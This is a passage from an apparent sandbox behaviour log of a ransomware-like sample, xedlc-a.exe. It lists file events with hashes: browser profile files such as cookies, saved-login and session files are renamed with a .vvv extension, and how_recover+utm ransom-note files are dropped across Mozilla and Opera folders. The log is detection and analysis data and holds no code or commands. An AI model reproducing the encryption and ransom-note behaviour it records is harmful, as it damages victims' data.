57843.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57844.            ads:
57845.          fid (ads:): 281474976778395
57846.          ntstatus: 0x0
57847.          CreateOptions: 0x60
57848.        file:
57849.          timestamp: 87363
57850.          mode: close
57851.          sequenceNumber: 1488
57852.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\bookmarkbackups\how_recover+utm.txt
57853.          filesize: 2682
57854.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
57855.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
57856.          processinfo:
57857.            pid: 1056
57858.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57859.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57860.            ads:
57861.          fid (ads:): 281474976778395
57862.          ntstatus: 0x0
57863.          CreateOptions: 0x0
57864.        file:
57865.          timestamp: 87424
57866.          mode: created
57867.          sequenceNumber: 1489
57868.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\bookmarkbackups\how_recover+utm.html
57869.          processinfo:
57870.            pid: 1056
57871.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57872.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57873.            ads:
57874.          fid (ads:): 281474976778396
57875.          ntstatus: 0x0
57876.          CreateOptions: 0x60
57877.        file:
57878.          timestamp: 87431
57879.          mode: close
57880.          sequenceNumber: 1490
57881.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\bookmarkbackups\how_recover+utm.html
57882.          filesize: 9495
57883.          md5sum: 95f596a25dff51b6af2042b1bbe02985
57884.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
57885.          processinfo:
57886.            pid: 1056
57887.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57888.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57889.            ads:
57890.          fid (ads:): 281474976778396
57891.          ntstatus: 0x0
57892.          CreateOptions: 0x0
57893.        file:
57894.          timestamp: 87438
57895.          mode: open
57896.          sequenceNumber: 1491
57897.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\cookies.txt
57898.          filesize: 157
57899.          processinfo:
57900.            pid: 1056
57901.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57902.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57903.            ads:
57904.          fid (ads:): 562949953478840
57905.          ntstatus: 0x0
57906.          CreateOptions: 0x200000
57907.        file:
57908.          timestamp: 87447
57909.          mode: close
57910.          sequenceNumber: 1492
57911.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\cookies.txt
57912.          filesize: 574
57913.          md5sum: 313389f8531ac24cf5485ce138b374dc
57914.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
57915.          processinfo:
57916.            pid: 1056
57917.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57918.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57919.            ads:
57920.          fid (ads:): 562949953478840
57921.          ntstatus: 0x0
57922.          CreateOptions: 0x0
57923.        file:
57924.          timestamp: 87457
57925.          mode: rename
57926.          sequenceNumber: 1493
57927.          filesize: 574
57928.          md5sum: 313389f8531ac24cf5485ce138b374dc
57929.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
57930.          processinfo:
57931.            pid: 1056
57932.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57933.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57934.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\cookies.txt
57935.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\cookies.txt.vvv
57936.            ads:
57937.          fid (ads:): 562949953478840
57938.          ntstatus: 0x0
57939.          CreateOptions: 0x0
57940.        file:
57941.          timestamp: 87467
57942.          mode: created
57943.          sequenceNumber: 1494
57944.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\extensions\how_recover+utm.txt
57945.          processinfo:
57946.            pid: 1056
57947.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57948.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57949.            ads:
57950.          fid (ads:): 281474976778397
57951.          ntstatus: 0x0
57952.          CreateOptions: 0x60
57953.        file:
57954.          timestamp: 87474
57955.          mode: close
57956.          sequenceNumber: 1495
57957.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\extensions\how_recover+utm.txt
57958.          filesize: 2682
57959.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
57960.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
57961.          processinfo:
57962.            pid: 1056
57963.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57964.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57965.            ads:
57966.          fid (ads:): 281474976778397
57967.          ntstatus: 0x0
57968.          CreateOptions: 0x0
57969.        file:
57970.          timestamp: 87481
57971.          mode: created
57972.          sequenceNumber: 1496
57973.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\extensions\how_recover+utm.html
57974.          processinfo:
57975.            pid: 1056
57976.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57977.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57978.            ads:
57979.          fid (ads:): 281474976778398
57980.          ntstatus: 0x0
57981.          CreateOptions: 0x60
57982.        file:
57983.          timestamp: 87488
57984.          mode: close
57985.          sequenceNumber: 1497
57986.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\extensions\how_recover+utm.html
57987.          filesize: 9495
57988.          md5sum: 95f596a25dff51b6af2042b1bbe02985
57989.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
57990.          processinfo:
57991.            pid: 1056
57992.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57993.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57994.            ads:
57995.          fid (ads:): 281474976778398
57996.          ntstatus: 0x0
57997.          CreateOptions: 0x0
57998.        file:
57999.          timestamp: 87496
58000.          mode: created
58001.          sequenceNumber: 1498
58002.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\minidumps\how_recover+utm.txt
58003.          processinfo:
58004.            pid: 1056
58005.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58006.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58007.            ads:
58008.          fid (ads:): 281474976778399
58009.          ntstatus: 0x0
58010.          CreateOptions: 0x60
58011.        file:
58012.          timestamp: 87503
58013.          mode: close
58014.          sequenceNumber: 1499
58015.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\minidumps\how_recover+utm.txt
58016.          filesize: 2682
58017.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58018.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58019.          processinfo:
58020.            pid: 1056
58021.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58022.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58023.            ads:
58024.          fid (ads:): 281474976778399
58025.          ntstatus: 0x0
58026.          CreateOptions: 0x0
58027.        file:
58028.          timestamp: 87512
58029.          mode: created
58030.          sequenceNumber: 1500
58031.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\minidumps\how_recover+utm.html
58032.          processinfo:
58033.            pid: 1056
58034.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58035.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58036.            ads:
58037.          fid (ads:): 281474976778400
58038.          ntstatus: 0x0
58039.          CreateOptions: 0x60
58040.        file:
58041.          timestamp: 87518
58042.          mode: close
58043.          sequenceNumber: 1501
58044.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\minidumps\how_recover+utm.html
58045.          filesize: 9495
58046.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58047.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58048.          processinfo:
58049.            pid: 1056
58050.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58051.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58052.            ads:
58053.          fid (ads:): 281474976778400
58054.          ntstatus: 0x0
58055.          CreateOptions: 0x0
58056.        file:
58057.          timestamp: 87526
58058.          mode: open
58059.          sequenceNumber: 1502
58060.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\prefs.js
58061.          filesize: 6989
58062.          processinfo:
58063.            pid: 1056
58064.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58065.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58066.            ads:
58067.          fid (ads:): 1970324837042125
58068.          ntstatus: 0x0
58069.          CreateOptions: 0x60
58070.        file:
58071.          timestamp: 87810
58072.          mode: close
58073.          sequenceNumber: 1503
58074.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\prefs.js
58075.          filesize: 7406
58076.          md5sum: c3c4965552caf2b5e1a2cb756e63fbb7
58077.          sha1sum: 37b18709954868d737477f829e0e4fa1ff335ab4
58078.          processinfo:
58079.            pid: 1056
58080.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58081.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58082.            ads:
58083.          fid (ads:): 1970324837042125
58084.          ntstatus: 0x0
58085.          CreateOptions: 0x0
58086.        file:
58087.          timestamp: 87819
58088.          mode: rename
58089.          sequenceNumber: 1504
58090.          filesize: 7406
58091.          md5sum: c3c4965552caf2b5e1a2cb756e63fbb7
58092.          sha1sum: 37b18709954868d737477f829e0e4fa1ff335ab4
58093.          processinfo:
58094.            pid: 1056
58095.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58096.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58097.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\prefs.js
58098.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\prefs.js.vvv
58099.            ads:
58100.          fid (ads:): 1970324837042125
58101.          ntstatus: 0x0
58102.          CreateOptions: 0x0
58103.        file:
58104.          timestamp: 87828
58105.          mode: open
58106.          sequenceNumber: 1505
58107.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\sessionstore.js
58108.          filesize: 781
58109.          processinfo:
58110.            pid: 1056
58111.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58112.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58113.            ads:
58114.          fid (ads:): 1407374883607848
58115.          ntstatus: 0x0
58116.          CreateOptions: 0x60
58117.        file:
58118.          timestamp: 87880
58119.          mode: close
58120.          sequenceNumber: 1506
58121.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\sessionstore.js
58122.          filesize: 1198
58123.          md5sum: 8c036e1d6d47b5a2734d1cd415c4b2dd
58124.          sha1sum: 033abdba48ba2d616bb01ef0e538f8c80b359ddf
58125.          processinfo:
58126.            pid: 1056
58127.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58128.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58129.            ads:
58130.          fid (ads:): 1407374883607848
58131.          ntstatus: 0x0
58132.          CreateOptions: 0x0
58133.        file:
58134.          timestamp: 87889
58135.          mode: rename
58136.          sequenceNumber: 1507
58137.          filesize: 1198
58138.          md5sum: 8c036e1d6d47b5a2734d1cd415c4b2dd
58139.          sha1sum: 033abdba48ba2d616bb01ef0e538f8c80b359ddf
58140.          processinfo:
58141.            pid: 1056
58142.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58143.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58144.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\sessionstore.js
58145.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\sessionstore.js.vvv
58146.            ads:
58147.          fid (ads:): 1407374883607848
58148.          ntstatus: 0x0
58149.          CreateOptions: 0x0
58150.        file:
58151.          timestamp: 87898
58152.          mode: open
58153.          sequenceNumber: 1508
58154.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons2.txt
58155.          filesize: 157
58156.          processinfo:
58157.            pid: 1056
58158.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58159.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58160.            ads:
58161.          fid (ads:): 32932572275204275
58162.          ntstatus: 0x0
58163.          CreateOptions: 0x200000
58164.        file:
58165.          timestamp: 87907
58166.          mode: close
58167.          sequenceNumber: 1509
58168.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons2.txt
58169.          filesize: 574
58170.          md5sum: 313389f8531ac24cf5485ce138b374dc
58171.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
58172.          processinfo:
58173.            pid: 1056
58174.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58175.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58176.            ads:
58177.          fid (ads:): 32932572275204275
58178.          ntstatus: 0x0
58179.          CreateOptions: 0x0
58180.        file:
58181.          timestamp: 87918
58182.          mode: rename
58183.          sequenceNumber: 1510
58184.          filesize: 574
58185.          md5sum: 313389f8531ac24cf5485ce138b374dc
58186.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
58187.          processinfo:
58188.            pid: 1056
58189.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58190.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58191.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons2.txt
58192.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons2.txt.vvv
58193.            ads:
58194.          fid (ads:): 32932572275204275
58195.          ntstatus: 0x0
58196.          CreateOptions: 0x0
58197.        file:
58198.          timestamp: 87927
58199.          mode: open
58200.          sequenceNumber: 1511
58201.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons3.txt
58202.          filesize: 157
58203.          processinfo:
58204.            pid: 1056
58205.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58206.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58207.            ads:
58208.          fid (ads:): 562949953478836
58209.          ntstatus: 0x0
58210.          CreateOptions: 0x200000
58211.        file:
58212.          timestamp: 87935
58213.          mode: close
58214.          sequenceNumber: 1512
58215.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons3.txt
58216.          filesize: 574
58217.          md5sum: 313389f8531ac24cf5485ce138b374dc
58218.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
58219.          processinfo:
58220.            pid: 1056
58221.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58222.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58223.            ads:
58224.          fid (ads:): 562949953478836
58225.          ntstatus: 0x0
58226.          CreateOptions: 0x0
58227.        file:
58228.          timestamp: 87946
58229.          mode: rename
58230.          sequenceNumber: 1513
58231.          filesize: 574
58232.          md5sum: 313389f8531ac24cf5485ce138b374dc
58233.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
58234.          processinfo:
58235.            pid: 1056
58236.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58237.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58238.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons3.txt
58239.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\signons3.txt.vvv
58240.            ads:
58241.          fid (ads:): 562949953478836
58242.          ntstatus: 0x0
58243.          CreateOptions: 0x0
58244.        file:
58245.          timestamp: 87957
58246.          mode: created
58247.          sequenceNumber: 1514
58248.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\webapps\how_recover+utm.txt
58249.          processinfo:
58250.            pid: 1056
58251.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58252.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58253.            ads:
58254.          fid (ads:): 281474976778401
58255.          ntstatus: 0x0
58256.          CreateOptions: 0x60
58257.        file:
58258.          timestamp: 87963
58259.          mode: close
58260.          sequenceNumber: 1515
58261.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\webapps\how_recover+utm.txt
58262.          filesize: 2682
58263.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58264.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58265.          processinfo:
58266.            pid: 1056
58267.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58268.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58269.            ads:
58270.          fid (ads:): 281474976778401
58271.          ntstatus: 0x0
58272.          CreateOptions: 0x0
58273.        file:
58274.          timestamp: 88025
58275.          mode: created
58276.          sequenceNumber: 1516
58277.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\webapps\how_recover+utm.html
58278.          processinfo:
58279.            pid: 1056
58280.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58281.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58282.            ads:
58283.          fid (ads:): 281474976778402
58284.          ntstatus: 0x0
58285.          CreateOptions: 0x60
58286.        file:
58287.          timestamp: 88031
58288.          mode: close
58289.          sequenceNumber: 1517
58290.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\webapps\how_recover+utm.html
58291.          filesize: 9495
58292.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58293.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58294.          processinfo:
58295.            pid: 1056
58296.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58297.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58298.            ads:
58299.          fid (ads:): 281474976778402
58300.          ntstatus: 0x0
58301.          CreateOptions: 0x0
58302.        file:
58303.          timestamp: 88040
58304.          mode: created
58305.          sequenceNumber: 1518
58306.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\how_recover+utm.txt
58307.          processinfo:
58308.            pid: 1056
58309.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58310.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58311.            ads:
58312.          fid (ads:): 281474976778403
58313.          ntstatus: 0x0
58314.          CreateOptions: 0x60
58315.        file:
58316.          timestamp: 88046
58317.          mode: close
58318.          sequenceNumber: 1519
58319.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\how_recover+utm.txt
58320.          filesize: 2682
58321.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58322.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58323.          processinfo:
58324.            pid: 1056
58325.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58326.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58327.            ads:
58328.          fid (ads:): 281474976778403
58329.          ntstatus: 0x0
58330.          CreateOptions: 0x0
58331.        file:
58332.          timestamp: 88078
58333.          mode: created
58334.          sequenceNumber: 1520
58335.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\how_recover+utm.html
58336.          processinfo:
58337.            pid: 1056
58338.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58339.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58340.            ads:
58341.          fid (ads:): 281474976778404
58342.          ntstatus: 0x0
58343.          CreateOptions: 0x60
58344.        file:
58345.          timestamp: 88084
58346.          mode: close
58347.          sequenceNumber: 1521
58348.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\how_recover+utm.html
58349.          filesize: 9495
58350.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58351.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58352.          processinfo:
58353.            pid: 1056
58354.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58355.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58356.            ads:
58357.          fid (ads:): 281474976778404
58358.          ntstatus: 0x0
58359.          CreateOptions: 0x0
58360.        file:
58361.          timestamp: 88092
58362.          mode: created
58363.          sequenceNumber: 1522
58364.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\how_recover+utm.txt
58365.          processinfo:
58366.            pid: 1056
58367.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58368.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58369.            ads:
58370.          fid (ads:): 281474976778405
58371.          ntstatus: 0x0
58372.          CreateOptions: 0x60
58373.        file:
58374.          timestamp: 88097
58375.          mode: close
58376.          sequenceNumber: 1523
58377.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\how_recover+utm.txt
58378.          filesize: 2682
58379.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58380.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58381.          processinfo:
58382.            pid: 1056
58383.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58384.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58385.            ads:
58386.          fid (ads:): 281474976778405
58387.          ntstatus: 0x0
58388.          CreateOptions: 0x0
58389.        file:
58390.          timestamp: 88104
58391.          mode: created
58392.          sequenceNumber: 1524
58393.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\how_recover+utm.html
58394.          processinfo:
58395.            pid: 1056
58396.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58397.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58398.            ads:
58399.          fid (ads:): 281474976778406
58400.          ntstatus: 0x0
58401.          CreateOptions: 0x60
58402.        file:
58403.          timestamp: 88110
58404.          mode: close
58405.          sequenceNumber: 1525
58406.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\how_recover+utm.html
58407.          filesize: 9495
58408.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58409.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58410.          processinfo:
58411.            pid: 1056
58412.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58413.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58414.            ads:
58415.          fid (ads:): 281474976778406
58416.          ntstatus: 0x0
58417.          CreateOptions: 0x0
58418.        file:
58419.          timestamp: 88117
58420.          mode: created
58421.          sequenceNumber: 1526
58422.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\how_recover+utm.txt
58423.          processinfo:
58424.            pid: 1056
58425.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58426.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58427.            ads:
58428.          fid (ads:): 281474976778407
58429.          ntstatus: 0x0
58430.          CreateOptions: 0x60
58431.        file:
58432.          timestamp: 88123
58433.          mode: close
58434.          sequenceNumber: 1527
58435.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\how_recover+utm.txt
58436.          filesize: 2682
58437.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58438.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58439.          processinfo:
58440.            pid: 1056
58441.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58442.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58443.            ads:
58444.          fid (ads:): 281474976778407
58445.          ntstatus: 0x0
58446.          CreateOptions: 0x0
58447.        file:
58448.          timestamp: 88396
58449.          mode: created
58450.          sequenceNumber: 1528
58451.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\how_recover+utm.html
58452.          processinfo:
58453.            pid: 1056
58454.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58455.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58456.            ads:
58457.          fid (ads:): 281474976778408
58458.          ntstatus: 0x0
58459.          CreateOptions: 0x60
58460.        file:
58461.          timestamp: 88402
58462.          mode: close
58463.          sequenceNumber: 1529
58464.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\how_recover+utm.html
58465.          filesize: 9495
58466.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58467.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58468.          processinfo:
58469.            pid: 1056
58470.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58471.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58472.            ads:
58473.          fid (ads:): 281474976778408
58474.          ntstatus: 0x0
58475.          CreateOptions: 0x0
58476.        file:
58477.          timestamp: 88410
58478.          mode: created
58479.          sequenceNumber: 1530
58480.          value: C:\Documents and Settings\admin\Application Data\Mozilla\how_recover+utm.txt
58481.          processinfo:
58482.            pid: 1056
58483.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58484.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58485.            ads:
58486.          fid (ads:): 281474976778409
58487.          ntstatus: 0x0
58488.          CreateOptions: 0x60
58489.        file:
58490.          timestamp: 88416
58491.          mode: close
58492.          sequenceNumber: 1531
58493.          value: C:\Documents and Settings\admin\Application Data\Mozilla\how_recover+utm.txt
58494.          filesize: 2682
58495.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58496.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58497.          processinfo:
58498.            pid: 1056
58499.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58500.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58501.            ads:
58502.          fid (ads:): 281474976778409
58503.          ntstatus: 0x0
58504.          CreateOptions: 0x0
58505.        file:
58506.          timestamp: 88566
58507.          mode: created
58508.          sequenceNumber: 1532
58509.          value: C:\Documents and Settings\admin\Application Data\Mozilla\how_recover+utm.html
58510.          processinfo:
58511.            pid: 1056
58512.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58513.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58514.            ads:
58515.          fid (ads:): 281474976778410
58516.          ntstatus: 0x0
58517.          CreateOptions: 0x60
58518.        file:
58519.          timestamp: 88572
58520.          mode: close
58521.          sequenceNumber: 1533
58522.          value: C:\Documents and Settings\admin\Application Data\Mozilla\how_recover+utm.html
58523.          filesize: 9495
58524.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58525.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58526.          processinfo:
58527.            pid: 1056
58528.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58529.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58530.            ads:
58531.          fid (ads:): 281474976778410
58532.          ntstatus: 0x0
58533.          CreateOptions: 0x0
58534.        file:
58535.          timestamp: 88580
58536.          mode: created
58537.          sequenceNumber: 1534
58538.          value: C:\Documents and Settings\admin\Application Data\Opera\Opera\how_recover+utm.txt
58539.          processinfo:
58540.            pid: 1056
58541.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58542.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58543.            ads:
58544.          fid (ads:): 281474976778411
58545.          ntstatus: 0x0
58546.          CreateOptions: 0x60
58547.        file:
58548.          timestamp: 88586
58549.          mode: close
58550.          sequenceNumber: 1535
58551.          value: C:\Documents and Settings\admin\Application Data\Opera\Opera\how_recover+utm.txt
58552.          filesize: 2682
58553.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58554.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58555.          processinfo:
58556.            pid: 1056
